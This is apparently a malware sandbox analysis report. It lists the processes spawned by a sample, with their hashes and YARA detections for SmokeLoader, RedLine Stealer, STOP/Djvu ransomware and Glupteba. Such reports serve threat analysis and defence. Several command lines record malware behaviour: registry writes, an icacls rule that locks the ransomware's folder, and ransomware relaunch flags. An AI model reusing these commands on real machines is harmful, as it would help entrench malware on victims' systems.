                                                                                                                                                                                                                                      MD5 hash:B05A74505FA03339578DFF002BA57C69
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2120177869.0000000000C20000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2120426554.0000000000D1F000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.2120318342.0000000000CC1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.2120318342.0000000000CC1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.2120238789.0000000000C80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.2120238789.0000000000C80000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:2
                                                                                                                                                                                                                                      Start time:17:49:51
                                                                                                                                                                                                                                      Start date:28/03/2024
                                                                                                                                                                                                                                      Path:C:\Windows\explorer.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                                                                                      Imagebase:0x7ff609140000
                                                                                                                                                                                                                                      File size:5'141'208 bytes
                                                                                                                                                                                                                                      MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:6
                                                                                                                                                                                                                                      Start time:17:50:11
                                                                                                                                                                                                                                      Start date:28/03/2024
                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Roaming\gtdirat
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:C:\Users\user\AppData\Roaming\gtdirat
                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                      File size:265'216 bytes
                                                                                                                                                                                                                                      MD5 hash:B05A74505FA03339578DFF002BA57C69
                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.2358331788.0000000000C80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000002.2358331788.0000000000C80000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000006.00000002.2358389618.0000000000CAD000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.2358489940.0000000002741000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000002.2358489940.0000000002741000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000006.00000002.2358317151.0000000000C70000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                                                      • Detection: 32%, ReversingLabs
                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:7
                                                                                                                                                                                                                                      Start time:17:50:13
                                                                                                                                                                                                                                      Start date:28/03/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\7F9A.bat" "
                                                                                                                                                                                                                                      Imagebase:0x7ff663c20000
                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:8
                                                                                                                                                                                                                                      Start time:17:50:13
                                                                                                                                                                                                                                      Start date:28/03/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:9
                                                                                                                                                                                                                                      Start time:17:50:13
                                                                                                                                                                                                                                      Start date:28/03/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\reg.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
                                                                                                                                                                                                                                      Imagebase:0x7ff7bcce0000
                                                                                                                                                                                                                                      File size:77'312 bytes
                                                                                                                                                                                                                                      MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:11
                                                                                                                                                                                                                                      Start time:17:51:02
                                                                                                                                                                                                                                      Start date:28/03/2024
                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                      File size:776'192 bytes
                                                                                                                                                                                                                                      MD5 hash:34BE2CA8394CF2DBD6AA006472864E97
                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000B.00000002.2820403987.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000B.00000002.2820403987.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000B.00000002.2820341095.00000000027D0000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:12
                                                                                                                                                                                                                                      Start time:17:51:03
                                                                                                                                                                                                                                      Start date:28/03/2024
                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                      File size:776'192 bytes
                                                                                                                                                                                                                                      MD5 hash:34BE2CA8394CF2DBD6AA006472864E97
                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                      • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:13
                                                                                                                                                                                                                                      Start time:17:51:04
                                                                                                                                                                                                                                      Start date:28/03/2024
                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:icacls "C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                                                                                                                                                                      Imagebase:0xba0000
                                                                                                                                                                                                                                      File size:29'696 bytes
                                                                                                                                                                                                                                      MD5 hash:2E49585E4E08565F52090B144062F97E
                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:16
                                                                                                                                                                                                                                      Start time:17:51:04
                                                                                                                                                                                                                                      Start date:28/03/2024
                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe --Task
                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                      File size:776'192 bytes
                                                                                                                                                                                                                                      MD5 hash:34BE2CA8394CF2DBD6AA006472864E97
                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000010.00000002.2845608400.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000010.00000002.2845608400.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000010.00000002.2845428957.00000000027D6000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:17
                                                                                                                                                                                                                                      Start time:17:51:05
                                                                                                                                                                                                                                      Start date:28/03/2024
                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe --Task
                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                      File size:776'192 bytes
                                                                                                                                                                                                                                      MD5 hash:34BE2CA8394CF2DBD6AA006472864E97
                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                      • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000011.00000002.4516919390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:18
                                                                                                                                                                                                                                      Start time:17:51:05
                                                                                                                                                                                                                                      Start date:28/03/2024
                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\DB15.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                      File size:776'192 bytes
                                                                                                                                                                                                                                      MD5 hash:34BE2CA8394CF2DBD6AA006472864E97
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000012.00000002.2843694068.0000000002890000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000012.00000002.2843694068.0000000002890000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000012.00000002.2843572828.00000000027F1000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:19
                                                                                                                                                                                                                                      Start time:17:51:05
                                                                                                                                                                                                                                      Start date:28/03/2024
                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\DB15.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\DB15.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                      File size:776'192 bytes
                                                                                                                                                                                                                                      MD5 hash:34BE2CA8394CF2DBD6AA006472864E97
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000013.00000002.4516721779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000013.00000002.4516721779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                      • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000013.00000002.4516721779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:21
                                                                                                                                                                                                                                      Start time:17:51:17
                                                                                                                                                                                                                                      Start date:28/03/2024
                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe" --AutoStart
                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                      File size:776'192 bytes
                                                                                                                                                                                                                                      MD5 hash:34BE2CA8394CF2DBD6AA006472864E97
                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000015.00000002.2971579481.00000000028A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000015.00000002.2971579481.00000000028A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000015.00000002.2970592193.0000000002708000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:22
                                                                                                                                                                                                                                      Start time:17:51:17
                                                                                                                                                                                                                                      Start date:28/03/2024
                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe" --AutoStart
                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                      File size:776'192 bytes
                                                                                                                                                                                                                                      MD5 hash:34BE2CA8394CF2DBD6AA006472864E97
                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000016.00000002.2979075027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000016.00000002.2979075027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                      • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000016.00000002.2979075027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:23
                                                                                                                                                                                                                                      Start time:17:51:19
                                                                                                                                                                                                                                      Start date:28/03/2024
                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\A0B.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\A0B.exe
                                                                                                                                                                                                                                      Imagebase:0xb0000
                                                                                                                                                                                                                                      File size:6'824'024 bytes
                                                                                                                                                                                                                                      MD5 hash:9E52AA572F0AFC888C098DB4C0F687FF
                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000017.00000003.3114615460.000000000148E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000017.00000003.3115169288.000000000148E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000017.00000003.3115958213.0000000001490000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                                                      • Detection: 92%, ReversingLabs
                                                                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:24
                                                                                                                                                                                                                                      Start time:17:51:20
                                                                                                                                                                                                                                      Start date:28/03/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\5F8F.bat" "
                                                                                                                                                                                                                                      Imagebase:0x7ff663c20000
                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:25
                                                                                                                                                                                                                                      Start time:17:51:20
                                                                                                                                                                                                                                      Start date:28/03/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                      Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:26
                                                                                                                                                                                                                                      Start time:17:51:20
                                                                                                                                                                                                                                      Start date:28/03/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\reg.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                      Commandline:reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
                                                                                                                                                                                                                                      Imagebase:0x7ff7bcce0000
                                                                                                                                                                                                                                      File size:77'312 bytes
                                                                                                                                                                                                                                      MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:27
                                                                                                                                                                                                                                      Start time:17:51:25
                                                                                                                                                                                                                                      Start date:28/03/2024
                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe" --AutoStart
                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                      File size:776'192 bytes
                                                                                                                                                                                                                                      MD5 hash:34BE2CA8394CF2DBD6AA006472864E97
                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000001B.00000002.3053638727.0000000002840000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000001B.00000002.3053638727.0000000002840000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000001B.00000002.3053445351.000000000279C000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:28
                                                                                                                                                                                                                                      Start time:17:51:25
                                                                                                                                                                                                                                      Start date:28/03/2024
                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exe" --AutoStart
                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                      File size:776'192 bytes
                                                                                                                                                                                                                                      MD5 hash:34BE2CA8394CF2DBD6AA006472864E97
                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000001C.00000002.3061490314.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000001C.00000002.3061490314.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                      • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000001C.00000002.3061490314.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                      Target ID:29
                                                                                                                                                                                                                                      Start time:17:51:28
                                                                                                                                                                                                                                      Start date:28/03/2024
                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\71C9.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\71C9.exe
                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                      File size:4'344'720 bytes
                                                                                                                                                                                                                                      MD5 hash:9857733C11948AC79AA5362444C01E94
                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 0000001D.00000002.3174783125.0000000000843000.00000040.00000001.01000000.0000000B.sdmp, Author: Joe Security
